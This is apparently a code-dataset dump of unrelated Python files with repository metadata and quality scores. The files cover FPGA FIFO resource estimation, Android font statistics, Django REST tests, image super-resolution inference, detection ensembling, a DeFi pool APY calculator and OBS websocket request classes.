"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
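        # Illustrative example (not from the original source): a FIFO with W = 8 and
        # depth = 512 falls into the W <= 9 branch above, giving
        # ceil(512 / 2048) * ceil(8 / 9) = 1 block RAM.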
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
            # Non-URAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| 1.351563 | 1 |
android_fonts.py | chrissimpkins/android_fonts | 1 | 3310 | import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| 2.484375 | 2 |
tests/test_list.py | amikrop/django-paste | 3 | 3311 | import json
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from paste import constants
from tests.mixins import SnippetListTestCaseMixin
from tests.utils import constant, create_snippet, create_user
class SnippetListTestCase(SnippetListTestCaseMixin, APITestCase):
"""Tests for the snippet list view."""
def url(self):
"""Return the snippet list URL."""
return reverse('snippet-list')
def post(self, **kwargs):
"""Send a POST request to the view's URL with data indicated by given
kwargs, as JSON, using the proper content-type, and return the
response.
"""
return self.client.post(
self.url(), data=json.dumps(kwargs),
content_type='application/json')
def test_get_success(self):
"""Snippet list GET must return all the viewable snippets."""
create_snippet('foo')
create_snippet('bar')
response = self.get()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 2)
self.assertEqual(response.data[0]['content'], 'foo')
self.assertEqual(response.data[1]['content'], 'bar')
def test_get_private(self):
"""Snippet list GET must return private snippets only to those
authorized to view them.
"""
owner = create_user('owner')
create_snippet('foo', private=True, owner=owner)
expected = [0, 0, 1, 1]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
self.check_for_users(check, owner)
def test_get_list_foreign(self):
"""Snippet list GET must not return snippets owned by other users if
        the LIST_FOREIGN setting is False, unless requested by a staff user.
"""
create_snippet('foo')
create_snippet('bar', owner=self.user)
expected = [0, 1, 2]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
with constant('LIST_FOREIGN', False):
self.check_for_users(check)
def test_post_success(self):
"""Snippet list POST must create a new snippet."""
response = self.post(
content='foo', style='friendly', embed_title=False)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['content'], 'foo')
self.assertEqual(response.data['title'], '')
self.assertEqual(response.data['language'], '')
self.assertEqual(response.data['style'], 'friendly')
self.assertEqual(
response.data['line_numbers'], constants.DEFAULT_LINE_NUMBERS)
self.assertFalse(response.data['embed_title'])
self.assertEqual(response.data['private'], constants.DEFAULT_PRIVATE)
self.assertIsNone(response.data['owner'])
def test_post_owner(self):
"""Snippet list POST must store currently authenticated user as the
newly created snippet's owner.
"""
self.client.force_authenticate(self.user)
response = self.post(content='foo')
self.assertEqual(response.data['owner'], self.user.pk)
def test_post_no_content(self):
"""Snippet list POST must return a 400 Bad Request response if no
content field is set.
"""
response = self.post(title='foo')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_oversized_title(self):
"""Snippet list POST must return a 400 Bad Request response if the
title field consists of more characters than the TITLE_MAX_LENGTH
setting indicates.
"""
title = 'a' * (constants.TITLE_MAX_LENGTH + 1)
response = self.post(content='foo', title=title)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_invalid(self):
"""Snippet list POST must return a 400 Bad Request response if a value
different than the available choices is set for a multiple choice
field.
"""
for field in ['language', 'style']:
response = self.post(
**{'content': 'foo', field: '123-invalid-abc'})
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST)
def check_post_forbid_anonymous(self, setting):
"""Check that snippet list POST returns a 403 Forbidden response to
anonymous users if the given setting is True.
"""
expected = (
[status.HTTP_403_FORBIDDEN] + [status.HTTP_400_BAD_REQUEST] * 2)
def check(i):
response = self.post()
self.assertEqual(response.status_code, expected[i])
with constant(setting):
self.check_for_users(check)
def test_post_forbid_anonymous(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS')
def test_post_forbid_anonymous_create(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS_CREATE setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS_CREATE')
def test_post_anonymous_private(self):
"""Snippet list POST must return a 400 Bad Request response to
anonymous users who attempt to create a private snippet.
"""
response = self.post(content='foo', private=True)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_pagination(self):
"""Snippet list must be able to handle pagination."""
self.check_pagination()
| 2.5 | 2 |
Algorithmic Toolbox/Greedy Algorithms/Maximum Advertisement Revenue/maximum_ad_revenue.py | ganeshbhandarkar/Python-Projects | 9 | 3312 | <gh_stars>1-10
# python3
from itertools import permutations
def max_dot_product_naive(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
max_product = 0
for permutation in permutations(second_sequence):
dot_product = sum(first_sequence[i] * permutation[i] for i in range(len(first_sequence)))
max_product = max(max_product, dot_product)
return max_product
def max_dot_product(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
    # Greedy solution: by the rearrangement inequality, the dot product is maximised
    # when both sequences are sorted the same way and paired position by position.
    return sum(f * s for f, s in zip(sorted(first_sequence), sorted(second_sequence)))
if __name__ == '__main__':
n = int(input())
prices = list(map(int, input().split()))
clicks = list(map(int, input().split()))
assert len(prices) == len(clicks) == n
print(max_dot_product(prices, clicks))
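    # Illustrative check (hypothetical input): prices = [23, 39, 39] and clicks = [1, 0, 1]
    # give 39 * 1 + 39 * 1 + 23 * 0 = 78 under the greedy pairing of the sorted sequences.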
| 3.15625 | 3 |
HelloWorldPython/IfStatements.py | SamIge7/Tutorials | 0 | 3313 | <gh_stars>0
hasGoodCredit = True
price = 1000000
deposit = 0
if hasGoodCredit:
deposit = price/10
else:
deposit = price/5
print(f"Deposit needed: £{deposit}") | 2.703125 | 3 |
main.py | vsundesha/documentation-hub-dependencies | 0 | 3314 | <reponame>vsundesha/documentation-hub-dependencies<gh_stars>0
import config as props
import sys
import getopt
from GitHubDataFetcher import GitHubDataFetcher
from DependencyFile import DependencyFile
from ErrorFile import ErrorFile
# Github Token
TOKEN = props.token
OWNER = ""
REPOSITORY = ""
OUTPUTFILE = ""
def showHelp():
print('-r or --repo The name of the github repository')
print('-o or --owner The owner of the github repository')
print('-f or --outputfile (Optional) (Default : <OWNER+REPONAME>dependecies.json) \
The output file')
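# Illustrative invocation (owner, repo and output name are placeholders):
#   python main.py -o vsundesha -r documentation-hub-dependencies -f deps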
def main(argv):
global OWNER, REPOSITORY, OUTPUTFILE
try:
        # opts holds the parsed (option, value) pairs; remainder collects any positional arguments left unparsed
opts, remainder = getopt.getopt(
argv, "hr:o:f:", ["repo=", "owner=", "outputfile="])
except getopt.GetoptError:
showHelp()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
showHelp()
sys.exit()
elif opt in ("-r", "--repo"):
REPOSITORY = arg
elif opt in ("-o", "--owner"):
OWNER = arg
elif opt in ("-f", "--outputfile"):
OUTPUTFILE = arg
# check if repo and owner are specified
if(OWNER and REPOSITORY):
# create the fetcher
data = GitHubDataFetcher(OWNER, REPOSITORY, TOKEN)
# get the response object
res = data.getInfo()
# response is type ErrorFile or DependencyFile
if(isinstance(res, DependencyFile)):
if(OUTPUTFILE):
output = OUTPUTFILE+"dependecies.json"
else:
output = OWNER+REPOSITORY+"dependecies.json"
elif(isinstance(res, ErrorFile)):
output = "error.json"
# write file
res.toJson(output)
else:
print("--repo and --owner arguments are mandatory")
if __name__ == "__main__":
main(sys.argv[1:])
| 2.578125 | 3 |
inference_realesrgan.py | blabra/Real-ESRGAN | 0 | 3315 | import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
        help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus | '
              'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2 | '
              'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
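    # Illustrative CLI invocation relying on the defaults declared above:
    #   python inference_realesrgan.py -i inputs -n RealESRGAN_x4plus -o results --outscale 4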
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| 2.25 | 2 |
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py | eragasa/pypospack | 4 | 3316 | <reponame>eragasa/pypospack
import os
filenames_delete = [
'CHG',
'CHGCAR',
'CONTCAR',
'DOSCAR',
'EIGENVAL',
'IBZKPT',
'job.err',
'job.out',
'OSZICAR',
'PCDAT',
'REPORT',
'vasp.log',
'vasprun.xml',
'WAVECAR',
'XDATCAR'
]
for filename in filenames_delete:
try:
os.remove(filename)
msg = "{} removed.".format(filename)
except FileNotFoundError as e:
msg = "{} does not exist.".format(filename)
except:
raise
print(msg)
| 2.71875 | 3 |
binary_trees/largest_values_in_tree_rows.py | ethyl2/code_challenges | 0 | 3317 | <gh_stars>0
'''
<NAME>'s solution.
See mine in largest_values_in_each_row.py
'''
from collections import deque
def largest_values_in_tree_rows(t):
rv = []
if t is None:
return rv
current_depth = 0
current_max = t.value
q = deque()
# add the root node to the queue at a depth of 0
q.append((t, current_depth))
while len(q) > 0:
node, depth = q.popleft()
# if the depth of the current node is different from
        # `current_depth`, add `current_max` to `rv` and then
# reset `current_max` and `current_depth`
if depth != current_depth:
rv.append(current_max)
current_max = node.value
current_depth = depth
# otherwise, we update `current_max` if we need to
else:
current_max = max(node.value, current_max)
# add the left and right children of the current node
# to the queue, along with their depths
if node.left:
q.append((node.left, depth + 1))
if node.right:
q.append((node.right, depth + 1))
# don't forget to append the last `current_max`
rv.append(current_max)
return rv
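# Illustrative usage (assumes a node type exposing value/left/right, which is not defined here):
# for a root 1 with children 3 (left) and 2 (right), the function returns [1, 3].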
| 3.234375 | 3 |
src/infer/_ExtractSimpleDeformTTA.py | RamsteinWR/PneumoniaRSNA1 | 0 | 3318 | <reponame>RamsteinWR/PneumoniaRSNA1
import json
import os
import re
import numpy as np
import pandas as pd
from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR
WDIR = os.path.dirname(os.path.abspath(__file__))
def get_results(det_folder, test_set, suffix):
filepath = os.path.join(det_folder, test_set, "results/detections_{}_results_{}.json".format(test_set, suffix))
with open(filepath) as f:
return json.load(f)
def flip_box(box):
"""
box (list, length 4): [x1, y1, w, h]
"""
# Get top right corner of prediction
x1 = box[0]
y1 = box[1]
w = box[2]
h = box[3]
topRight = (x1 + w, y1)
# Top left corner of flipped box is:
newTopLeft = (1024. - topRight[0], topRight[1])
return [newTopLeft[0], newTopLeft[1], w, h]
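# Illustrative example: in the 1024-px-wide images assumed above, flip_box([100, 50, 200, 80])
# returns [724.0, 50, 200, 80]: the prediction's top-right corner becomes the
# top-left corner of the horizontally flipped box.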
def convert_dict_to_df(results, mapping, metadata, test_set, flip=False, threshold=0.):
list_of_image_ids = []
list_of_scores = []
list_of_bboxes = []
for res in results:
coco_image_id = res["image_id"]
coco_img_file = "COCO_{}_{}.png".format(test_set, str(coco_image_id).zfill(12))
list_of_image_ids.append(mapping[coco_img_file])
list_of_scores.append(res["score"])
list_of_bboxes.append(res["bbox"])
if flip:
list_of_bboxes = [flip_box(_) for _ in list_of_bboxes]
results_df = pd.DataFrame({"patientId": [pid.split(".")[0] for pid in list_of_image_ids],
"score": list_of_scores,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"bbox": list_of_bboxes})
results_df = results_df.sort_values(["patientId", "score"], ascending=False)
results_df = results_df[results_df.score >= threshold]
results_df = results_df.merge(metadata, on="patientId", how="left")
return results_df[["patientId", "score", "x", "y", "w", "h", "bbox", "view"]]
with open(MAPPINGS_PATH) as f:
mapping = json.load(f)
with open(MAPPINGS_PATH.replace(test_image_set, "{}_flip".format(test_image_set))) as f:
flip_mapping = json.load(f)
metadata = pd.read_csv(METADATA_PATH)
def get_TTA_results(fold_imsize, test_image_set, MAIN_DIR):
TTAs = []
for test_set in [test_image_set, "{}_flip".format(test_image_set)]:
for suffix in ["original", "scale080", "scale120"]:
tmp_results = get_results(os.path.join(MAIN_DIR, "peepin_{}".format(fold_imsize, fold_imsize)),
test_set=test_set, suffix=suffix)
if re.search("_flip", test_set):
tmp_df = convert_dict_to_df(tmp_results,
flip_mapping,
metadata,
test_set=test_set,
flip=True,
threshold=0.01)
else:
tmp_df = convert_dict_to_df(tmp_results,
mapping,
metadata,
test_set=test_set,
flip=False,
threshold=0.01)
TTAs.append(tmp_df)
return TTAs
exec(open(os.path.join(WDIR, "DetectionEnsemble.py")).read())  # execfile() is Python 2-only; exec(open(...).read()) is the Python 3 equivalent
def run_ensemble(list_of_dfs, metadata, adjust_score=True):
list_of_pids = []
list_of_ensemble_bboxes = []
for pid in np.unique(metadata.patientId):
list_of_tmp_dfs = []
list_of_detections = []
view = metadata[metadata.patientId == pid]["view"].iloc[0]
for df_index, each_df in enumerate(list_of_dfs):
tmp_df = each_df[each_df.patientId == pid]
list_of_bboxes = []
for rownum, row in tmp_df.iterrows():
bbox = row.bbox
bbox.append(1)
bbox.append(row.score)
list_of_bboxes.append(bbox)
list_of_detections.append(list_of_bboxes)
from src.infer.DetectionEnsemble import GeneralEnsemble
list_of_ensemble_bboxes.append(GeneralEnsemble(list_of_detections, iou_thresh=0.4))
list_of_pids.append(pid)
# Create new DataFrame
list_of_new_pids = []
list_of_bboxes = []
for i, ensemble_bboxes in enumerate(list_of_ensemble_bboxes):
for bbox in ensemble_bboxes:
list_of_new_pids.append(list_of_pids[i])
list_of_bboxes.append(bbox)
ensemble_bbox_df = pd.DataFrame({"patientId": list_of_new_pids,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"score": [box[5] for box in list_of_bboxes],
"votes": [box[-1] for box in list_of_bboxes],
"bbox": list_of_bboxes})
if adjust_score:
ensemble_bbox_df["score"] = ensemble_bbox_df.score * ensemble_bbox_df.votes
return ensemble_bbox_df
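# Note: each ensembled box returned by GeneralEnsemble is consumed above as
# [x, y, w, h, label, score, ..., votes]; the score sits at index 5 and the vote
# count in the last position (inferred from the indexing, not documented here).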
imsizes = [224, 256, 288, 320, 352, 384, 416, 448, 480, 512]
fold0_nom = "fold{}_{}".format(0, imsizes[0])
fold1_nom = "fold{}_{}".format(1, imsizes[1])
fold2_nom = "fold{}_{}".format(2, imsizes[2])
fold3_nom = "fold{}_{}".format(3, imsizes[3])
fold4_nom = "fold{}_{}".format(4, imsizes[4])
fold5_nom = "fold{}_{}".format(5, imsizes[5])
fold6_nom = "fold{}_{}".format(6, imsizes[6])
fold7_nom = "fold{}_{}".format(7, imsizes[7])
fold8_nom = "fold{}_{}".format(8, imsizes[8])
fold9_nom = "fold{}_{}".format(9, imsizes[9])
fold1RCNN0 = run_ensemble(get_TTA_results("fold1_256", test_image_set, RCNN0_DETS_DIR.format(fold1_nom)), metadata)
fold3RCNN0 = run_ensemble(get_TTA_results("fold3_320", test_image_set, RCNN0_DETS_DIR.format(fold3_nom)), metadata)
fold5RCNN0 = run_ensemble(get_TTA_results("fold5_384", test_image_set, RCNN0_DETS_DIR.format(fold5_nom)), metadata)
fold7RCNN0 = run_ensemble(get_TTA_results("fold7_448", test_image_set, RCNN0_DETS_DIR.format(fold7_nom)), metadata)
fold9RCNN0 = run_ensemble(get_TTA_results("fold9_512", test_image_set, RCNN0_DETS_DIR.format(fold9_nom)), metadata)
list_of_dfs = [fold1RCNN0, fold3RCNN0, fold5RCNN0, fold7RCNN0, fold9RCNN0]
final_TTA_ensemble = run_ensemble(list_of_dfs, metadata, adjust_score=False)
final_TTA_ensemble["adjustedScore"] = final_TTA_ensemble.score * final_TTA_ensemble.votes
final_TTA_ensemble = final_TTA_ensemble[["patientId", "x", "y", "w", "h", "score", "votes", "adjustedScore"]]
final_TTA_ensemble.to_csv(os.path.join(WDIR, "../../SimpleDCNPredictions.csv"), index=False)
| 2.390625 | 2 |
pool4.py | yfii/yfiiapi | 4 | 3319 | from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
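# getAmountsOut quotes a swap of 1 YFII along the YFII -> WETH -> DAI path defined
# above; the last element of the returned amounts is the DAI received, i.e. the
# YFII price expressed in DAI.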
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| 2.203125 | 2 |
obswebsocket/requests.py | PanBartosz/obs-websocket-py | 123 | 3320 | <filename>obswebsocket/requests.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# THIS FILE WAS GENERATED BY generate_classes.py - DO NOT EDIT #
# (Generated on 2020-12-20 18:26:33.661372) #
from .base_classes import Baserequests
class GetVersion(Baserequests):
"""Returns the latest version of the plugin and the API.
:Returns:
*version*
type: double
OBSRemote compatible API version. Fixed to 1.1 for retrocompatibility.
*obs_websocket_version*
type: String
obs-websocket plugin version.
*obs_studio_version*
type: String
OBS Studio program version.
*available_requests*
type: String
List of available request types, formatted as a comma-separated list string (e.g. : "Method1,Method2,Method3").
*supported_image_export_formats*
type: String
List of supported formats for features that use image export (like the TakeSourceScreenshot request type) formatted as a comma-separated list string
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVersion'
self.datain['version'] = None
self.datain['obs-websocket-version'] = None
self.datain['obs-studio-version'] = None
self.datain['available-requests'] = None
